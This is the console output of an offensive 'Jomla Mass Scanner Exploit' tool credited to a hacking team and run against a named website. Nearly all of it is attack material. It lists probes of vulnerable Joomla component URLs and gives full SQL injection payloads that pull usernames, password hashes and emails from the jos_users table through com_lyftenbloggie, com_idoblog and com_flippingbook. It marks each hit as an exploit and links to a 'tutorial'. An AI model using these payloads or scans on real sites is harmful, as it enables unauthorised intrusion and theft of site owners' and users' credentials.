Jomla Mass Scanner Exploit

root@ns3:~# python jomla.py www.ptpjb.com

                         Sincan2 Scan Jomla Scanner

                         Coded By Sincan2 MHL Team
                  www.mergosono.com

[+] Target: www.ptpjb.com/
[+] Exploit Loaded: 25

[+] Scanning Exploit

[+] Testing: index.php/component/osproperty/?task=agent_register

        [+] Result: 303 See other
        [+] Exploit: com_osproperty
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--

        [+] Result: 303 See other
        [+] Exploit: com_lyftenbloggie [SQLi]
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

        [+] Result: 303 See other
        [+] Exploit: com_idoblog
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

        [+] Result: 303 See other
        [+] Exploit: com_fabrik
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_fireboard&Itemid=

        [+] Result: 303 See other
        [+] Exploit: com_fireboard
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_smartformer

        [+] Result: 303 See other
        [+] Exploit: com_smartformer
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

        [+] Result: 303 See other
        [+] Exploit: com_media
        [+] Tutorial: http://mergosono.com

[+] Testing: administrator/components/com_redmystic/chart/tmp-upload-images/

        [-] Result: 404 Not Found

[+] Testing: index.php?option=com_acymailing&gtask=archive&listid=

        [+] Result: 303 See other
        [+] Exploit: com_acymailing [SQLi]
        [+] Tutorial: http://mergosono.com

[+] Testing: index.php?option=com_shohada&view=shohada

        [+] Result: 303 See other
        [+] Exploit: com_shohada
        [+] Tutorial: http://mergosono.com

[+] Testing: /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*

        [+] Result: 303 See other
        [+] Exploit: com_flippingbook [SQLi]
        [+] Tutorial: http://mergosono.com

 

 

 

 

Jomla Exploit Mass Scanner